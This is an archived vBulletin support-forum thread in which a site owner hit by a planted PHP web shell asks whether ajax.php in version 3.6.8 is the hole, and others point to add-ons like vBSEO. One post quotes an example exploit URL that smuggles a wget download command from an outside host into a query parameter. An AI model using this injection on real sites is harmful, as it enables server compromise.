vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 Programming Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=15)
-   -   is ajax.php on vB 3.6.8 causing my security hole and malicious software infections? (https://vborg.vbsupport.ru/showthread.php?t=285708)

z0diac 07-19-2012 01:10 AM
is ajax.php on vB 3.6.8 causing my security hole and malicious software infections?
 
I've been getting infected with malicious software daily for the last week. I've hired the good guys at Total Server Solutions and they have pointed toward ajax.php being insecure.

Is there an updated version of JUST that file that I can use with vB 3.6.8 ? I cannot do a full vB upgrade due to a lot of php file edits that have been done to create some custom stuff.

Are there any known security holes in ajax.php on my version of vB? (The !C99madShell v. 2.0 madnet edition! hack was put on)

NEED HELP with ajax.php and what I can do to it so this doesn't happen again!

Zachery 07-19-2012 01:34 AM
Not out of the box. your third party addons, or old version of vBulletin may be allowing hackers access. Its also possible they got in completely unrelated to your vb site and hit your site as they were passing by.

z0diac 07-19-2012 02:10 AM
Could updating just the ajax.php file to a more recent version help secure it?

Simon Lloyd 07-19-2012 05:11 AM
It definitely wont be the ajax file, it's usually due to an add on poorly coded allowing access, if you have all the security patches for vb up to date for your installation then it will be from something else, do you have vbseo?

Check these too:
https://www.vbulletin.com/forum/entr...Forums-(Part-1)
https://www.vbulletin.com/forum/entr...Forums-(Part-2)
https://www.vbulletin.com/docs/html/securing_vbulletin
https://vborg.vbsupport.ru/showthread.php?t=193930

z0diac 07-19-2012 02:47 PM
Quote:
Originally Posted by Simon Lloyd (Post 2349431)
It definitely wont be the ajax file, it's usually due to an add on poorly coded allowing access, if you have all the security patches for vb up to date for your installation then it will be from something else, do you have vbseo?

Check these too:
https://www.vbulletin.com/forum/entr...Forums-(Part-1)
https://www.vbulletin.com/forum/entr...Forums-(Part-2)
https://www.vbulletin.com/docs/html/securing_vbulletin
https://vborg.vbsupport.ru/showthread.php?t=193930
Yes I have VBSEO although I cant' even remember what it does.

It was definitely the ajax.php file in 3.6.8 - the guys at Total Server Solutions tried a test of the exploit on it and it worked. They put on a vb 4.x ajax.php file and tried the exploit, and it didn't work.

Exploit in 3.6.8 ajax.php (example):
Code:
http://forum.mydomain.com/ajax.php?global=wget%20http://www.whatever.com/images/logo2.png

Simon Lloyd 07-19-2012 03:22 PM
The xploit may well have worked on taht php file but unless your vbseo is patched up to date thats almost certainly where it was injected, there's been many threads on it, go to vbseo and check your version against the latest, they have a tool you can download to check.

kh99 07-19-2012 03:32 PM
I think you might want to check your plugins and see if you have any that use hook ajax_start or ajax_complete - the ajax.php file itself doesn't use the global parameter so something else must have been processing the command (I suppose it could have to do with vbseo - I don't know how that exploit worked).

Edit: BTW, here's an older thread discussing the issue: www.vbulletin.org/forum/showthread.php?t=202532 ...and if what was said in that thread is true, ajax.php isn't the original problem, it's just where a "back door" was added.


All times are GMT. The time now is 07:09 PM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01111 seconds
  • Memory Usage 1,726KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (1)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (7)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete